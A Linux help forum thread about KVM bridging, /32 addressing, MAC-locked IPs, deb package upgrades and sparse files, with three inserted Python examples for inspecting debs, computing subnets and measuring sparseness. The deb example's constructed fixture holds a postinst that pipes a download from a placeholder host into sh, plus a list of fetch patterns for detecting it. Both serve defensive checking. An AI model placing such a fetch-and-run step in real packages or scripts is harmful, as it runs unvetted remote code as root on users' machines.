The Milkman
Jun 22, 2003

No one here is alone,
satellites in every home


Lipstick Apathy

There are also the Selenium standalone Docker images, if you would like a different type of headache:

https://hub.docker.com/u/selenium/


D. Ebdrup
Mar 13, 2009


I don't know how I missed it until today, but I just found out about ncspot - it's a Spotify TUI client, like many others, but this one behaves not unlike ncmpc, so it's just about infinitely better than spt, which I was using up until now.
Another upshot is that ncspot doesn't have problems shuffling my giant playlists unlike spt, which was frustrating because I like to queue up music I like instead of what Spotify wants to recommend.

So if you hadn't heard about it and find you have the same problems, maybe check it out? It's in FreeBSD Ports, so it should be in a repo near you.

Tea Bone
Feb 18, 2011

I'm going for gasps.

I have a dedicated remote server running Ubuntu server 20.04 with 6 public IPs assigned to it.
I'm trying to set up some webservers inside KVMs and assign each guest its own IP. I assume the way I want to do this is with a standard network bridge (without NAT).
So far I've managed to get the Bridge working on the host with netplan, but can't seem to get the guests to connect.

My netplan looks like this:
code:
network:
    ethernets:
        eth0:
            dhcp4: no
    bridges:
        br0:
            dhcp4: yes
            interfaces: [eth0]
    version: 2
I've also tried it with dhcp and manual addresses:
code:
network:
    ethernets:
        eth0:
            dhcp4: no
    bridges:
        br0:
            dhcp4: yes
            addresses: [xxx.xxx.x.1/32, xxx.xxx.x.2/32, xxx.xxx.x.3/32, xxx.xxx.x.4/32, xxx.xxx.x.5/32, xxx.xxx.x.6/32]
            interfaces: [eth0]
    version: 2
but again the guests won't connect and all IPs end up pointing to the host. (The IPs aren't necessarily in series as the above implies; I don't know if this makes a difference?)

This is a bit out of my wheelhouse, so I'd really appreciate some pointers in the right direction.

Shaocaholica
Oct 29, 2002

Fig. 5E


This seems like a dumb question for 2020, but deb packages have a concept of how to update an existing install, right? For instance, Discord just pointed me to an updated deb of the latest version. I assume I can just use whatever package manager in my Debian distro to install this package without manually uninstalling or 'preparing' the previous install, right? Smart people have built that logic into the newer deb package, right?

CaptainSarcastic
Jul 6, 2013

HAIL SATAN


Shaocaholica posted:

This seems like a dumb question for 2020, but deb packages have a concept of how to update an existing install, right? For instance, Discord just pointed me to an updated deb of the latest version. I assume I can just use whatever package manager in my Debian distro to install this package without manually uninstalling or 'preparing' the previous install, right? Smart people have built that logic into the newer deb package, right?

The package manager should handle that. I think Debian uses apt? I haven't run a Debian-based distro in years but I remember apt being a perfectly reasonable package manager. One RPM distro I used to run used apt for package management, and it was fine.

Mr Shiny Pants
Nov 12, 2012


Tea Bone posted:

I have a dedicated remote server running Ubuntu server 20.04 with 6 public IPs assigned to it.
I'm trying to set up some webservers inside KVMs and assign each guest its own IP. I assume the way I want to do this is with a standard network bridge (without NAT).
So far I've managed to get the Bridge working on the host with netplan, but can't seem to get the guests to connect.

My netplan looks like this:
code:
network:
    ethernets:
        eth0:
            dhcp4: no
    bridges:
        br0:
            dhcp4: yes
            interfaces: [eth0]
    version: 2
I've also tried it with dhcp and manual addresses:
code:
network:
    ethernets:
        eth0:
            dhcp4: no
    bridges:
        br0:
            dhcp4: yes
            addresses: [xxx.xxx.x.1/32, xxx.xxx.x.2/32, xxx.xxx.x.3/32, xxx.xxx.x.4/32, xxx.xxx.x.5/32, xxx.xxx.x.6/32]
            interfaces: [eth0]
    version: 2
but again the guests won't connect and all IPs end up pointing to the host. (The IPs aren't necessarily in series as the above implies; I don't know if this makes a difference?)

This is a bit out of my wheelhouse, so I'd really appreciate some pointers in the right direction.

A bridge is a Layer 2 device; it can have an IP address but does not need one (a transparent bridge).
What you probably want is one IP address on the bridge for management, and the VMs use the bridge as a "shared device". Inside the VMs (on the actual running OS inside the VM) you configure their IP configuration with the provided IP addresses.

Docker might also be something you could take a look at. There are a lot of ways to get this running. A reverse proxy might also be a thing that could work.

Mr Shiny Pants fucked around with this message at 06:03 on Sep 6, 2020

Tea Bone
Feb 18, 2011

I'm going for gasps.

Thanks for replying. I think my understanding of bridges might be off and I need to do some reading up. No matter what I try the VMs just can't seem to see the bridge, even if I try assigning the IPs statically from within the VM.

For the time being I think I'm going to go down the reverse proxy route since that's something I'm more comfortable with and I'm starting to come up against time constraints.

MrPablo
Mar 21, 2003



Shaocaholica posted:

This seems like a dumb question for 2020, but deb packages have a concept of how to update an existing install, right? For instance, Discord just pointed me to an updated deb of the latest version. I assume I can just use whatever package manager in my Debian distro to install this package without manually uninstalling or 'preparing' the previous install, right? Smart people have built that logic into the newer deb package, right?

Short answer: You should just be able to install the new deb file without manually uninstalling the old one, like so:

code:
sudo dpkg -i /path/to/file.deb
Longer answer:

Under the hood, a deb file is just an ar archive which contains a pair of tarballs and a few other bits of information.

The tarballs inside a deb file are:

  • control.tar.{xz,gz}: Package control data, including the package metadata and maintainer scripts
  • data.tar.{gz,xz}: Actual package files

A well-formed deb file typically contains a maintainer script to handle upgrades (see section 6.5 of this page for details). As part of the installation process, dpkg will unpack the file from the update and run the maintainer scripts as-needed.

With that in mind, assuming you have all of the dependencies, and assuming the Discord folks are building their deb files correctly, a "dpkg -i" should be sufficient to upgrade from an old version of Discord to a newer version.

Here's an example of me updating gh from version 0.11.0 to 0.11.1 with dpkg, without uninstalling the 0.11.0 deb:

code:
pabs@flex:~> sudo dpkg -i Downloads/gh_0.11.1_linux_amd64.deb 
[sudo] password for pabs: 
(Reading database ... 360346 files and directories currently installed.)
Preparing to unpack .../gh_0.11.1_linux_amd64.deb ...
Unpacking gh (0.11.1) over (0.11.0) ...
Setting up gh (0.11.1) ...
Processing triggers for man-db (2.9.3-2) ...
pabs@flex:~> 
Added bonus: here's an example of me peeking through the contents of a random deb file to look at the metadata (the "control" file in the control.tar.xz tarball) and one of the maintainer scripts:

code:
pabs@flex:~/Downloads/tmp> ar t debianutils_4.9.1_amd64.deb 
debian-binary
control.tar.xz
data.tar.xz
pabs@flex:~/Downloads/tmp> ar x debianutils_4.9.1_amd64.deb control.tar.xz && mkdir control && cd control && tar xf ../control.tar.xz && ls
control  md5sums  postinst  postrm
pabs@flex:~/Downloads/tmp/control> cat control 
Package: debianutils
Version: 4.9.1
Architecture: amd64
Essential: yes
Maintainer: Clint Adams <clint@debian.org>
Installed-Size: 230
Pre-Depends: libc6 (>= 2.15)
Section: utils
Priority: required
Multi-Arch: foreign
Description: Miscellaneous utilities specific to Debian
 This package provides a number of small utilities which are used
 primarily by the installation scripts of Debian packages, although
 you may use them directly.
 .
 The specific utilities included are:
 add-shell installkernel ischroot remove-shell run-parts savelog
 tempfile which
pabs@flex:~/Downloads/tmp/control> cat postinst 
#! /bin/sh -e

if test -z "$2" && test ! -f /etc/shells
then
        cp -p /usr/share/debianutils/shells /etc/shells
fi

case "$1" in
    configure)
    if [ ! -e /usr/bin/which ]
    then
	    ln -s /bin/which /usr/bin/which
    fi
    ;;

    abort-upgrade|abort-remove|abort-deconfigure)

    ;;

    *)
        echo "postinst called with unknown argument \`$1'" >&2
        exit 1
    ;;
esac
pabs@flex:~/Downloads/tmp/control> 
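
Since `dpkg -i` runs whatever maintainer scripts the package ships, as root, it is worth reading them before installing a third-party deb such as Discord's. The following is an added example (my code, not dpkg's and not from the post above) that parses the outer ar container and the control tarball directly in Python and returns the Package/Version fields, which maintainer scripts are present, and a crude flag for scripts that pipe a download into a shell. The package it builds in memory is a constructed fixture, the `example-app` name and `example.invalid` URL are made up, and the `FETCH_PATTERNS` heuristic is a starting point for a manual read, not an audit.

```python
import io
import tarfile
from typing import Dict, List, Tuple

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# Crude patterns for scripts that pull code off the network at install time (assumption: heuristic only).
FETCH_PATTERNS = ("curl ", "wget ", "| sh", "| bash")


def ar_members(blob: bytes) -> List[Tuple[str, bytes]]:
    """Walk the outer 'ar' container of a .deb and return (member name, bytes) pairs.

    Each member has a 60-byte header: name(16) mtime(12) uid(6) gid(6) mode(8)
    size(10) magic(2); member data is padded with a newline to an even length.
    """
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    pos, members = len(AR_MAGIC), []
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError(f"bad ar member header at offset {pos}")
        name = hdr[0:16].decode("ascii").rstrip(" ").rstrip("/")  # GNU ar may append '/'
        size = int(hdr[48:58].decode("ascii").strip())
        data = blob[pos + 60:pos + 60 + size]
        if len(data) != size:
            raise ValueError(f"truncated member {name!r}")
        members.append((name, data))
        pos += 60 + size + (size & 1)
    return members


def parse_control_fields(text: str) -> Dict[str, str]:
    """Parse the 'control' file: 'Field: value' lines; continuation lines start with whitespace."""
    fields: Dict[str, str] = {}
    key = None
    for line in text.splitlines():
        if line[:1] in (" ", "\t") and key:
            fields[key] += "\n" + line
        elif ":" in line:
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
    return fields


def inspect_deb(blob: bytes) -> Dict[str, object]:
    """Read metadata and maintainer scripts out of a .deb without installing it."""
    members = dict(ar_members(blob))
    if members.get("debian-binary", b"").strip() != b"2.0":
        raise ValueError("missing or unsupported debian-binary member")
    control_blobs = [d for n, d in members.items() if n.startswith("control.tar")]
    if not control_blobs:
        raise ValueError("no control.tar member")
    with tarfile.open(fileobj=io.BytesIO(control_blobs[0]), mode="r:*") as tf:
        entries = {m.name.lstrip("./"): m for m in tf.getmembers() if m.isfile()}
        control = parse_control_fields(tf.extractfile(entries["control"]).read().decode())
        scripts = {n: tf.extractfile(entries[n]).read().decode()
                   for n in MAINTAINER_SCRIPTS if n in entries}
    return {
        "package": control.get("Package"),
        "version": control.get("Version"),
        "maintainer_scripts": sorted(scripts),
        "scripts_fetching_from_network": sorted(
            n for n, body in scripts.items() if any(p in body for p in FETCH_PATTERNS)),
    }


def build_deb(control_text: str, scripts: Dict[str, str], payload: Dict[str, str]) -> bytes:
    """Assemble a minimal .deb in memory (constructed test fixture, not a real package)."""
    def tar_gz(files: Dict[str, str]) -> bytes:
        buf = io.BytesIO()
        with tarfile.open(fileobj=buf, mode="w:gz") as tf:
            for name, content in files.items():
                data = content.encode()
                info = tarfile.TarInfo("./" + name)
                info.size, info.mode = len(data), 0o755
                tf.addfile(info, io.BytesIO(data))
        return buf.getvalue()

    def ar_member(name: str, data: bytes) -> bytes:
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode("ascii")
        return hdr + data + (b"\n" if len(data) % 2 else b"")

    return (AR_MAGIC
            + ar_member("debian-binary", b"2.0\n")
            + ar_member("control.tar.gz", tar_gz({"control": control_text, **scripts}))
            + ar_member("data.tar.gz", tar_gz(payload)))


# Constructed sample package: a postinst that pipes a download into sh, which is exactly
# the kind of thing you want to notice before running dpkg -i as root.
SAMPLE_CONTROL = ("Package: example-app\nVersion: 1.2.3\nArchitecture: amd64\n"
                  "Description: constructed sample package\n used only by this example\n")
SAMPLE_SCRIPTS = {
    "postinst": "#!/bin/sh\nset -e\ncurl -fsSL https://example.invalid/setup.sh | sh\n",
    "postrm": "#!/bin/sh\nexit 0\n",
}
SAMPLE_PAYLOAD = {"usr/share/doc/example-app/README": "constructed payload\n"}


def deb_demo() -> Dict[str, object]:
    return inspect_deb(build_deb(SAMPLE_CONTROL, SAMPLE_SCRIPTS, SAMPLE_PAYLOAD))


if __name__ == "__main__":
    for k, v in deb_demo().items():
        print(f"{k}: {v}")
```

`inspect_deb(open("file.deb", "rb").read())` works the same way on a package you downloaded; the network-fetch list is plain substring matching, so treat it as "read this one first", not as a verdict, and remember that `dpkg -i` does not check any signature on a standalone deb, only apt repositories are signed.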

waffle iron
Jan 16, 2004


Shaocaholica posted:

This seems like a dumb question for 2020, but deb packages have a concept of how to update an existing install, right? For instance, Discord just pointed me to an updated deb of the latest version. I assume I can just use whatever package manager in my Debian distro to install this package without manually uninstalling or 'preparing' the previous install, right? Smart people have built that logic into the newer deb package, right?

Other people have answered it better, but one thing I will note is that some packages like Google Chrome will install a package source file in /etc/apt/sources.list.d/ so that the package manager (apt, apt-get, aptitude, Synaptic, GNOME Software, etc.) will automatically update it. It doesn't look like Discord does that. Some people will install closed source packages with Snap or Flatpak so that there are automatic updates and the dependencies are sandboxed. Personally, I use Steam with Flatpak because it manages all the i386 dependencies.

Tea Bone
Feb 18, 2011

I'm going for gasps.

Tea Bone posted:

Thanks for replying. I think my understanding of bridges might be off and I need to do some reading up. No matter what I try the VMs just can't seem to see the bridge, even if I try assigning the IPs statically from within the VM.

For the time being I think I'm going to go down the reverse proxy route since that's something I'm more comfortable with and I'm starting to come up against time constraints.

Okay, I think I've made some headway with the bridge situation.

I switched over to CentOS and enabled a bridge via Cockpit.
code:
bridge link show
shows eth0 and vnet0. I'm assuming vnet0 is the VM since it doesn't show up until I boot up KVM. I'm still unable to get a connection but the fact something is showing up on the bridge makes me think I'm closer.

other people
Jun 27, 2004
Associate Christ

vnet0 is the tun/tap virtual device which is the hypervisor's representation of a guest virtual NIC. Put a packet in and it arrives in the guest. When the guest NIC sends a packet it pops out of the vnetX on the hypervisor. The vnetX name is not special; it is just the style libvirt defaults to.

virsh domiflist or something like that will show which vnetX is connected to which guest.

You'd have to create a bridge on the hypervisor and attach both a "real" interface and some guest vnetX device(s) to join their broadcast domains. This means from the guest nic point of view it is now connected to the same L2 network as the hypervisor's physical nic (whichever one you plugged into the bridge). Just think of the bridge as being like a virtual switch. If you want the hypervisor to also have an L3 address (IPv4 and/or IPv6 address) on this network then you assign it to the bridge interface itself (br0 or whatever).

Tea Bone
Feb 18, 2011

I'm going for gasps.

other people posted:

vnet0 is the tun/tap virtual device which is the hypervisor's representation of a guest virtual NIC. Put a packet in and it arrives in the guest. When the guest NIC sends a packet it pops out of the vnetX on the hypervisor. The vnetX name is not special; it is just the style libvirt defaults to.

virsh domiflist or something like that will show which vnetX is connected to which guest.

You'd have to create a bridge on the hypervisor and attach both a "real" interface and some guest vnetX device(s) to join their broadcast domains. This means from the guest nic point of view it is now connected to the same L2 network as the hypervisor's physical nic (whichever one you plugged into the bridge). Just think of the bridge as being like a virtual switch. If you want the hypervisor to also have an L3 address (IPv4 and/or IPv6 address) on this network then you assign it to the bridge interface itself (br0 or whatever).

Okay, I've read through this and I *think* this is what I'm doing.

I've created the bridge network and connected my eth0 to it. I've then applied this bridge network to virt-manager. It looks like both are communicating with the bridge. The host with the physical nic is still receiving network connectivity. The guest machine isn't connecting, but when I turn it on I can see virt0 light up here:

and send/receive a few KBs. Is that what you mean by creating the bridge on the hypervisor and attaching both a real interface and a guest one?

Currently, the bridge is still using DHCP and receiving only 1 IP. I was under the impression this would still work for confirming that both devices connect?

All I want to do is have my VMs act like real machines with static IPs. Even if I get this bridge thing working am I going about it completely the wrong way? As I said in my OP, this is a little out of my area, bridging felt like the correct way of doing things but I could be misguided. There's also some level of sunk cost fallacy there, I should have given up and tried something else hours ago but feel like I've been on the edge of breaking through.

other people
Jun 27, 2004
Associate Christ

How is IP addressing assigned in this network? Do you have to set the IP in the guest statically or does the network do DHCP? From that pic it *appears* the guest should be good to go.

Of course, the network might shut down the hypervisor physdev if it sees STP that the bridge is probably generating. Or, the DHCP server might only hand out leases to specific MACs. So while you might have the basic connectivity for the guest done in a valid way it still might not work due to some outside policy.

The easiest way to find out would be to ask.

Or I guess a basic step is assuming the guest and the hypervisor bridge both have an IP then see if they can ping each other because that should work regardless of any policy of the physical network.

Tea Bone
Feb 18, 2011

I'm going for gasps.

I've tried both static and dhcp, neither seem to work. I've spoken to the support at the server farm and they said there's no policy on their side which should stop it so that's not the issue.

The guest isn't getting an IP (at least that I can see), if I put something in manually it shows up with "ip a"/"ifconfig" but any attempt to ping anything (except 0.0.0.0/127.0.0.1 but I assume that's from the loopback) just gets:
"connect: Network is unreachable"

It's entirely possible that I'm setting the static details up wrong, my IP pool isn't sequential, it's something akin to:
1.1.2.1 <- this is the bridge's IP
1.1.4.10
1.1.5.20
2.2.4
1.1.5.5
1.1.3.20

So I'm not too sure how to set up the netmask.

edit: The current network/interfaces on the guest looks like this:
code:
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
	address 1.1.5.20
	netmask 255.255.255.255
	network 127.0.0.1
	broadcast 127.0.0.1
I'm pretty certain the network and broadcast are wrong, that's just one iteration of different addresses I've tried them on (also tried 0.0.0.0, 1.1.5.20, 1.1.2.1)

edit edit: I've just tried pinging 1.1.5.20 from the guest (its own manually assigned IP) and it gives a response. Again though, I'm assuming that's just because the network is its home IP

Triple edit: In a moment of desperation I called the support team again and the agent this time straight away confirmed for me that the IPs are bound to a MAC address so that's why it's not working. 3 days well spent

Tea Bone fucked around with this message at 22:33 on Sep 6, 2020

Mr Shiny Pants
Nov 12, 2012


Tea Bone posted:

I've tried both static and dhcp, neither seem to work. I've spoken to the support at the server farm and they said there's no policy on their side which should stop it so that's not the issue.

The guest isn't getting an IP (at least that I can see), if I put something in manually it shows up with "ip a"/"ifconfig" but any attempt to ping anything (except 0.0.0.0/127.0.0.1 but I assume that's from the loopback) just gets:
"connect: Network is unreachable"

It's entirely possible that I'm setting the static details up wrong, my IP pool isn't sequential, it's something akin to:
1.1.2.1 <- this is the bridge's IP
1.1.4.10
1.1.5.20
2.2.4
1.1.5.5
1.1.3.20

So I'm not too sure how to set up the netmask.

edit: The current network/interfaces on the guest looks like this:
code:
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
	address 1.1.5.20
	netmask 255.255.255.255
	network 127.0.0.1
	broadcast 127.0.0.1
I'm pretty certain the network and broadcast are wrong, that's just one iteration of different addresses I've tried them on (also tried 0.0.0.0, 1.1.5.20, 1.1.2.1)

edit edit: I've just tried pinging 1.1.5.20 from the guest (its own manually assigned IP) and it gives a response. Again though, I'm assuming that's just because the network is its home IP

Triple edit: In a moment of desperation I called the support team again and the agent this time straight away confirmed for me that the IPs are bound to a MAC address so that's why it's not working. 3 days well spent

You probably need to give them the MAC address in advance, right?

other people
Jun 27, 2004
Associate Christ

Sorry but your IP configuration is totally bunk.

127.0.0.1 is not a valid network or broadcast address. And a netmask of 255.255.255.255 defines a network of 1 host; it's not correct.

The network address is the first address in the address range and the broadcast address is the last. Typically you don't have to bother giving these in a config file because they are so easy for the system to infer from the IP and netmask/prefix, but that is not a RHEL/Fedora style config file so I dunno what your network service is doing.

Anyway, for example, if your IP address is 192.168.122.10/24 (a netmask of 255.255.255.0) then the network address is 192.168.122.0 and the broadcast address is 192.168.122.255.


You must ask your support people what the netmask (aka prefix) is for the network. You can do some things to try to infer it but that is prone to error and if you get it wrong you may run into connectivity issues when your system thinks it can reach some hosts directly via L2 when it really can't, etc..

For 1.1.2.1 and 1.1.5.20 to be part of the same network the netmask would have to be at least 255.255.248.0 (/21). That's totally plausible but it could be even bigger and you wouldn't know without asking. Using that as an example, the network would be 1.1.0.0/21 with a broadcast address of 1.1.7.255.

If your hypervisor can get at least one IP via DHCP you can peek at the lease details and glean the netmask, DNS, etc which would give you all you need to know how to define your static addressing (just change out the IP as needed).

Tea Bone
Feb 18, 2011

I'm going for gasps.

other people posted:

Sorry but your IP configuration is totally bunk.

127.0.0.1 is not a valid network or broadcast address. And a netmask of 255.255.255.255 defines a network of 1 host; it's not correct.

The network address is the first address in the address range and the broadcast address is the last. Typically you don't have to bother giving these in a config file because they are so easy for the system to infer from the IP and netmask/prefix, but that is not a RHEL/Fedora style config file so I dunno what your network service is doing.

Anyway, for example, if your IP address is 192.168.122.10/24 (a netmask of 255.255.255.0) then the network address is 192.168.122.0 and the broadcast address is 192.168.122.255.


You must ask your support people what the netmask (aka prefix) is for the network. You can do some things to try to infer it but that is prone to error and if you get it wrong you may run into connectivity issues when your system thinks it can reach some hosts directly via L2 when it really can't, etc..

For 1.1.2.1 and 1.1.5.20 to be part of the same network the netmask would have to be at least 255.255.248.0 (/21). That's totally plausible but it could be even bigger and you wouldn't know without asking. Using that as an example, the network would be 1.1.0.0/21 with a broadcast address of 1.1.7.255.

If your hypervisor can get at least one IP via DHCP you can peek at the lease details and glean the netmask, DNS, etc which would give you all you need to know how to define your static addressing (just change out the IP as needed).

Thanks for your help. Yeah, I expected that my config was bad and part of the problem. The 255.255.255.255 was the netmask given to me by the support team, and looking at the working hypervisor's lease, the netmask is indeed 255.255.255.255 with a broadcast of 0.0.0.0. I can't seem to find the network address, but I'm assuming from your explanation that since the network is the first address in the range it should be the server's own IP (since the mask is 32 bits), but then surely the broadcast should also be that?

I've checked and confirmed these connections work on the hypervisor when set manually rather than DHCP and it's still able to connect.

I suspect there's something more going on with the config on the server farm's side which is even further outside of my understanding. For the time being I've set up a reverse proxy to just pass connections through to the VMs since I need this working for tomorrow. I might try to come back to it in a week or so if I feel like punishing myself, but the fact that IP addresses are locked to the host's MAC probably makes this a non-starter, right?

other people
Jun 27, 2004
Associate Christ

What does the routing table look like on the hypervisor? The neighbour table?

# ip route
# ip neigh


Afaik, if you assign an IP with a /32 then the kernel will not create a prefix route and then your routing table will be completely empty unless you've manually added something to it. And then no duh you won't be able to reach anything remote.

Surely they gave you some gateway IP address? I suppose if they insist on the /32 prefix then something like this should work:

# ip addr add 1.1.5.20/32 dev eth0
# ip route add <GATEWAYIP> dev eth0
# ip route add default via <GATEWAYIP>


That will "force" your system to arp for the gateway and assuming that resolves then your system will transmit *any* packet destined for a remote IP to the gateway at layer 2. I guess this is some level of security.
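
The subnet arithmetic a few posts up (1.1.2.1 and 1.1.5.20 forcing at least a /21, with network 1.1.0.0 and broadcast 1.1.7.255) and the /32 routing consequence just described can both be checked with Python's standard library. The following is an added example, not code from the thread or from any of the posters: it takes the address pool from Tea Bone's post (minus the malformed "2.2.4" entry), computes the smallest prefix that could contain all of them, shows which connected route the kernel would or would not derive for a given prefix, and lists the manual routes that correspond to the `ip route add` commands above. The gateway 1.1.0.1 is a placeholder, since the thread never names one, and `eth0` is assumed as the interface.

```python
import ipaddress
from typing import Dict, List

# Pool from Tea Bone's post, minus the malformed "2.2.4" entry; gateway is an assumed placeholder.
POOL = ["1.1.2.1", "1.1.4.10", "1.1.5.20", "1.1.5.5", "1.1.3.20"]
ASSUMED_GATEWAY = "1.1.0.1"


def smallest_common_network(addrs: List[str]) -> str:
    """Smallest prefix that contains every address: a lower bound on the real netmask.

    The provider's network can only be this size or larger, never smaller, which is
    why this is a hint to confirm with support, not a value to configure blindly.
    """
    ips = [ipaddress.IPv4Address(a) for a in addrs]
    for prefixlen in range(32, -1, -1):
        net = ipaddress.IPv4Interface(f"{ips[0]}/{prefixlen}").network
        if all(ip in net for ip in ips):
            return str(net)
    raise AssertionError("unreachable: /0 contains every address")


def address_facts(cidr: str) -> Dict[str, str]:
    """Netmask, network (first address) and broadcast (last address) for a host in CIDR form."""
    net = ipaddress.IPv4Interface(cidr).network
    return {"netmask": str(net.netmask),
            "network": str(net.network_address),
            "broadcast": str(net.broadcast_address)}


def kernel_connected_routes(cidr: str, dev: str = "eth0") -> List[str]:
    """The 'proto kernel scope link' route Linux adds alongside an address.

    A /32 names only the host itself, so nothing is on-link and no prefix route appears,
    which is why the main routing table stays empty until you add something by hand.
    """
    iface = ipaddress.IPv4Interface(cidr)
    if iface.network.prefixlen == 32:
        return []
    return [f"{iface.network} dev {dev} proto kernel scope link src {iface.ip}"]


def static_routes_needed(cidr: str, gateway: str, dev: str = "eth0") -> List[str]:
    """Routes the admin must add for the gateway to be usable, in 'ip route add' wording.

    With a normal prefix the gateway is already on-link and only 'default via' is needed.
    With a /32 (or a gateway outside the prefix) the gateway first needs an explicit
    on-link host route, otherwise the default route is rejected as unreachable.
    """
    iface = ipaddress.IPv4Interface(cidr)
    gw = ipaddress.IPv4Address(gateway)
    routes = []
    if gw not in iface.network:
        routes.append(f"{gw} dev {dev}")
    routes.append(f"default via {gw} dev {dev}")
    return routes


def is_on_link(dst: str, cidr: str) -> bool:
    """Would this host ARP for dst directly instead of sending it to the gateway?

    This is the failure mode of guessing a mask that is too wide: the system believes a
    host is reachable at L2 when it is not and never sends the packet to the gateway.
    """
    return ipaddress.IPv4Address(dst) in ipaddress.IPv4Interface(cidr).network


if __name__ == "__main__":
    print("lower bound on the shared network:", smallest_common_network(POOL))
    print("192.168.122.10/24 ->", address_facts("192.168.122.10/24"))
    print("1.1.5.20/21 ->", address_facts("1.1.5.20/21"))
    print("kernel routes for 1.1.5.20/32:", kernel_connected_routes("1.1.5.20/32"))
    print("manual routes for 1.1.5.20/32:", static_routes_needed("1.1.5.20/32", ASSUMED_GATEWAY))
    print("guessed /21 would ARP for 1.1.2.1 directly:", is_on_link("1.1.2.1", "1.1.5.20/21"))
    print("with the /32 the provider gave, it is sent via the gateway:", not is_on_link("1.1.2.1", "1.1.5.20/32"))
```

The /32 plus on-link gateway route is the configuration the provider's own DHCP lease (mask 255.255.255.255, broadcast 0.0.0.0) is describing: every destination, including the neighbouring addresses in the pool, is forced through the gateway at L2, so the provider's switch can pin each IP to one MAC.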

Mr Shiny Pants
Nov 12, 2012


Tea Bone posted:

Thanks for your help. Yeah, I expected that my config was bad and part of the problem. The 255.255.255.255 was the netmask given to me by the support team, and looking at the working hypervisor's lease, the netmask is indeed 255.255.255.255 with a broadcast of 0.0.0.0. I can't seem to find the network address, but I'm assuming from your explanation that since the network is the first address in the range it should be the server's own IP (since the mask is 32 bits), but then surely the broadcast should also be that?

I've checked and confirmed these connections work on the hypervisor when set manually rather than DHCP and it's still able to connect.

I suspect there's something more going on with the config on the server farm's side which is even further outside of my understanding. For the time being I've set up a reverse proxy to just pass connections through to the VMs since I need this working for tomorrow. I might try to come back to it in a week or so if I feel like punishing myself, but the fact that IP addresses are locked to the host's MAC probably makes this a non-starter, right?

Surely you can get them to change the MACs? Get the MAC addresses from KVM and have them change the assigned IPs.

Or spoof the MACs using KVM if you are sure there are no machines listening with the spoofed MAC anymore.

other people
Jun 27, 2004
Associate Christ

Sorry I missed the bit about the IP addresses being locked to specific MAC addresses. You have six IPs, are they all currently "locked" to the same MAC or what?

Give them the MACs of your VMs and ask them to change the associations?

Or you could mangle all the packets in/out with nftables so every packet leaves the hypervisor with the same MAC but it would be kinda lame to have to do that. At that point you may as well assign every IP to the hypervisor and use rules to NAT to whichever (isolated) VM per IP.

Tea Bone
Feb 18, 2011

I'm going for gasps.

Mr Shiny Pants posted:

Surely you can get them to change the MACs? Get the MAC addresses from KVM and have them change the assigned IPs.

Or spoof the MACs using KVM if you are sure there are no machines listening with the spoofed MAC anymore.

You would think so, but apparently they can't (or won't) reassign them. It was probably naive of me not to check before purchasing them, but it seemed a logical conclusion that the use of multiple IPs would be for bridging them to VMs.

I considered spoofing the MACs but was low on time and unsure if I was way off base and it wouldn't work. I might give that a try when I'm ready to play around with it again!

Computer viking
May 30, 2011
Now with less breakage.

Is there any halfway reliable way to distinguish sparse vs compressed files from userland? I guess you could try cat-ing it to a new file and see if the on-disk size changes, but that seems overly dumb even for me. On a filesystem without compression you could just use "apparent and on-disk size are different", but that's obviously going to get a lot of false positives if you support both.

And no, I don't have any use for this, I'm just curious.

Computer viking fucked around with this message at 08:19 on Sep 8, 2020

D. Ebdrup
Mar 13, 2009


Computer viking posted:

Is there any halfway reliable way to distinguish sparse vs compressed files from userland? I guess you could try cat-ing it to a new file and see if the on-disk size changes, but that seems overly dumb even for me. On a filesystem without compression you could just use "apparent and on-disk size are different", but that's obviously going to get a lot of false positives if you support both.

And no, I don't have any use for this, I'm just curious.
One of the cooler things about GNU find is that its printf mode supports the %S format which prints file sparseness, so you can do: (g)find /path/to/directory -type f -printf "%S\t%p\n"
Have a look at the man-page for how exactly it figures things out.

Computer viking
May 30, 2011
Now with less breakage.

Going by the man page, that's (st_blocks * BLOCKSIZE) / st_size, which is a convenient number to have - but I don't think it will distinguish between compressed and sparse files?
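
To make the %S figure concrete, here is an added Python example (not from the thread) that computes the same ratio find does from `os.stat` and compares a constructed sparse file against a dense one of the same apparent size. It assumes a filesystem that supports holes (ext4, xfs, tmpfs all do); on a filesystem that compresses, a dense file can also come out below 1.0, so the ratio flags "fewer blocks allocated than bytes", not sparseness specifically, which is the limitation Computer viking points out.

```python
import os
import tempfile
from typing import Tuple

# st_blocks is reported in 512-byte units on Linux regardless of the filesystem block size.
BLOCKSIZE = 512


def sparseness(path: str) -> float:
    """Same ratio as GNU find's %S: (st_blocks * BLOCKSIZE) / st_size.

    find leaves the zero-size case undefined; this example treats it as 1.0 (an assumption).
    """
    st = os.stat(path)
    if st.st_size == 0:
        return 1.0
    return (st.st_blocks * BLOCKSIZE) / st.st_size


def write_sparse(path: str, size: int) -> None:
    """Seek past size-1 bytes and write one byte: the hole allocates no data blocks."""
    with open(path, "wb") as f:
        f.seek(size - 1)
        f.write(b"\0")


def write_dense(path: str, size: int) -> None:
    """Write every byte, so every block is allocated (unless the filesystem compresses)."""
    with open(path, "wb") as f:
        f.write(b"\xff" * size)


def sparse_demo(size: int = 4 * 1024 * 1024) -> Tuple[float, float]:
    """Return (sparse ratio, dense ratio) for two constructed files of equal apparent size."""
    with tempfile.TemporaryDirectory() as d:
        sparse, dense = os.path.join(d, "sparse"), os.path.join(d, "dense")
        write_sparse(sparse, size)
        write_dense(dense, size)
        return sparseness(sparse), sparseness(dense)


if __name__ == "__main__":
    s, d = sparse_demo()
    print(f"sparse file: %S = {s:.4f}")
    print(f"dense file:  %S = {d:.4f}")
```

A ratio well below 1.0 is a strong hint that a file has holes on a non-compressing filesystem; the one thing you can say with confidence is that a ratio of 1.0 or above means the file is neither sparse nor compressed.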

Saukkis
May 16, 2003

Unless I'm on the inside curve pointing straight at oncoming traffic the high beams stay on and I laugh at your puny protest flashes.
I am Most Important Man. Most Important Man in the World.

Tea Bone posted:

You would think so, but apparently they can't (or won't) reassign them. It was probably naive of me not to check before purchasing them, but it seemed a logical conclusion that the use of multiple IPs would be for bridging them to VMs.

